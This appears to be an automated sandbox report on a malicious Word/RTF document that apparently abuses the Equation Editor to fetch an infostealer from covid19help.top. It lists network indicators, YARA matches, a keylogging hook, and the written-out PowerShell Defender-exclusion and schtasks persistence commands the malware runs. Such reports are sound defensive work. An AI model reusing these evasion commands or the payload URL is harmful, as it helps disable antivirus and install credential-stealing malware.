                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.0000000000349000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.627022282.0000000005449000.00000004.00000020.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.628212267.0000000005BC1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.0000000000349000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.627022282.0000000005449000.00000004.00000020.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.628212267.0000000005BC1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.0000000000349000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.341543164.0000000000376000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.341543164.00000000002FB000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.627022282.0000000005449000.00000004.00000020.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.628212267.0000000005BC1000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr.2.dr, pgZzUFYKXcIRkU.exe.5.dr, xobizx[1].scr.2.dr | String found in binary or memory: http://ocsp.comodoca.com0
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.0000000000349000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.627022282.0000000005449000.00000004.00000020.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.628212267.0000000005BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.0000000000349000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.627022282.0000000005449000.00000004.00000020.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.628212267.0000000005BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.0000000000349000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.627022282.0000000005449000.00000004.00000020.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.628212267.0000000005BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.0000000000349000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.627022282.0000000005449000.00000004.00000020.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.628212267.0000000005BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.0000000000349000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.627022282.0000000005449000.00000004.00000020.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.628212267.0000000005BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.0000000000349000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.627022282.0000000005449000.00000004.00000020.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.628212267.0000000005BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                    Source: obimohohj75.scr, 00000005.00000002.371272562.000000000261B000.00000004.00000800.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 0000000D.00000002.378702669.000000000232B000.00000004.00000800.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.626533099.000000000264D000.00000004.00000800.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.626533099.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.627290510.0000000002241000.00000004.00000800.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.627290510.00000000022E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.0000000000349000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.627022282.0000000005449000.00000004.00000020.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.628212267.0000000005BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.0000000000349000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.627022282.0000000005449000.00000004.00000020.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.628212267.0000000005BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                    Source: obimohohj75.scr, 00000005.00000002.371692371.00000000035E1000.00000004.00000800.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.625847603.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: obimohohj75.scr, 0000000E.00000002.626533099.0000000002662000.00000004.00000800.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.627290510.00000000022E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipif8
                    Source: obimohohj75.scr, 00000005.00000002.371692371.00000000035E1000.00000004.00000800.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.626533099.000000000264D000.00000004.00000800.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.625847603.0000000000402000.00000040.00000400.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.626533099.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.627290510.0000000002241000.00000004.00000800.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.627290510.00000000022E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                    Source: pgZzUFYKXcIRkU.exe, 00000016.00000002.627290510.00000000022E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: obimohohj75.scr, 0000000E.00000002.626533099.000000000264D000.00000004.00000800.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.627290510.00000000022E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/T
                    Source: obimohohj75.scr, 0000000E.00000002.626533099.000000000264D000.00000004.00000800.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.626533099.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.627290510.0000000002241000.00000004.00000800.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.627290510.00000000022E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.00000000002FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covid19help.top/dOzJ
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.00000000002FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covid19help.top/t
                    Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.341543164.00000000002FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covid19help.top/xobizx.scr
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.00000000002FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covid19help.top/xobizx.scrC:
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.00000000002CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covid19help.top/xobizx.scrY.
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.00000000002CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covid19help.top/xobizx.scra
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.00000000002CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covid19help.top/xobizx.scrj
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.00000000002CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covid19help.top/xobizx.scrkkC:
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.0000000000349000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.627022282.0000000005449000.00000004.00000020.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.628212267.0000000005BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.0000000000376000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.341543164.00000000002FB000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr.2.dr, pgZzUFYKXcIRkU.exe.5.dr, xobizx[1].scr.2.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49164
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
                    Source: unknownHTTPS traffic detected: 172.67.175.222:443 -> 192.168.2.22:49163 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.22:49164 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.22:49165 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    Source: 5.2.obimohohj75.scr.35e1930.5.raw.unpack, A1HZ.cs | .Net Code: _5O4
                    Source: 5.2.obimohohj75.scr.361c350.6.raw.unpack, A1HZ.cs | .Net Code: _5O4
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\obimohohj75.scr
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe

                    System Summary

                    Source: Scan 368 1.doc, type: SAMPLE | Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                    Source: 5.2.obimohohj75.scr.35e1930.5.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 5.2.obimohohj75.scr.361c350.6.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 14.2.obimohohj75.scr.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 5.2.obimohohj75.scr.361c350.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 5.2.obimohohj75.scr.35e1930.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: Screenshot number: 4 | Screenshot OCR: Enable editing") from the yellow bar aboveASSIGNMENTMCS 473: MARKETING MANAGEMENT & STRATEGYSTUDENT
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\xobizx[1].scr
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\obimohohj75.scr
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Memory allocated: 770B0000 page execute and read and write
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Memory allocated: 770B0000 page execute and read and write
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Memory allocated: 770B0000 page execute and read and write
                    Source: tmp786B.tmp.5.dr | OLE indicator, VBA macros: true
                    Source: tmp786B.tmp.5.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                    Source: Scan 368 1.doc, type: SAMPLE | Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                    Source: 5.2.obimohohj75.scr.35e1930.5.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 5.2.obimohohj75.scr.361c350.6.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 14.2.obimohohj75.scr.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 5.2.obimohohj75.scr.361c350.6.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 5.2.obimohohj75.scr.35e1930.5.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: xobizx[1].scr.2.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: obimohohj75.scr.2.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: pgZzUFYKXcIRkU.exe.5.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 5.2.obimohohj75.scr.35e1930.5.raw.unpack, YsTq4S.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 5.2.obimohohj75.scr.35e1930.5.raw.unpack, ZNczHvI78.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 5.2.obimohohj75.scr.35e1930.5.raw.unpack, G2Tmmpnyphl.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 5.2.obimohohj75.scr.35e1930.5.raw.unpack, G2Tmmpnyphl.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 5.2.obimohohj75.scr.61d0000.10.raw.unpack, G2ZSj4grjIGLRxUPme.cs | Security API names: _0020.SetAccessControl
                    Source: 5.2.obimohohj75.scr.61d0000.10.raw.unpack, G2ZSj4grjIGLRxUPme.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 5.2.obimohohj75.scr.61d0000.10.raw.unpack, G2ZSj4grjIGLRxUPme.cs | Security API names: _0020.AddAccessRule
                    Source: 5.2.obimohohj75.scr.61d0000.10.raw.unpack, NZ3F1JZLvRhU8cxwHy.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winDOC@26/22@5/3
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$an 368 1.doc
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Mutant created: NULL
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Mutant created: \Sessions\1\BaseNamedObjects\sgWhCAggfQPwpXhx
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR5BC5.tmp
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................%.........................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................0%.........................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................?%.........................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................U%.........................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................d%.........................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n...............................{%.........................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................%.........................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..........%.........................s.................... .......................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................%.........................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................%.........................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................%.........................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......%.........................s....................$.......................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................&.........................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................(........&.........................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................(.......*&.........................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s....................2.......................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................(.......R&.........................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................(.......j&.........................s....................l.......................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................(.......z&.........................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................(........&.........................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................(........&.........................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................`. ............... .....(.P.....................x...............................................................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D....... .......HJ.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D....... .......TJ.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D....... .......iJ.........................s............................x...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D....... .......uJ.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D.......@........J.........................s............................x...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D.......@........J.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n.......<.......D.......@........J.........................s............................x...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D.......@........K.........................s............................x...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..........K.........................s.................... .......x...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............'K.........................s............................x...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............EK.........................s............................x...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D...............SK.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.....eK.........................s....................$.......x...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D....... .......wK.........................s............................x...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D.......@........K.........................s............................x...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D.......@........K.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s....................2.......x...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D.......@........K.........................s............................x...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D.......@........K.........................s....................l.......x...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D.......@........K.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....<.......D.......@........L.........................s............................x...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....<.......D.......@........L.........................s............................x...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................0........C.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................0........C.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................0........D.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................0........D.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................0.......#D.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................0......./D.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n.......................0.......AD.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................0.......MD.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.0......._D.........................s.................... .......................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................0.......kD.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................0.......}D.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................0........D.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......D.........................s....................$.......................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................0........D.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................0........D.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................0........D.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s....................2.......................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................0........D.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................D.........................s....................l.......................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................E.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P..............................E.........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................'E.........................s............................................
                    Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................E.R.R.O.R.:. ............................8......................................h...............................
                    Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................E.R.R.O.(.P..............................8..............................................j.......(. .............
Source: C:\Users\user\AppData\Roaming\obimohohj75.scr WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\obimohohj75.scr File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Scan 368 1.doc Virustotal: Detection: 47%
Source: Scan 368 1.doc ReversingLabs: Detection: 47%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\obimohohj75.scr "C:\Users\user\AppData\Roaming\obimohohj75.scr"
Source: C:\Users\user\AppData\Roaming\obimohohj75.scr Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obimohohj75.scr"
Source: C:\Users\user\AppData\Roaming\obimohohj75.scr Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"
Source: C:\Users\user\AppData\Roaming\obimohohj75.scr Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pgZzUFYKXcIRkU" /XML "C:\Users\user\AppData\Local\Temp\tmp786B.tmp"
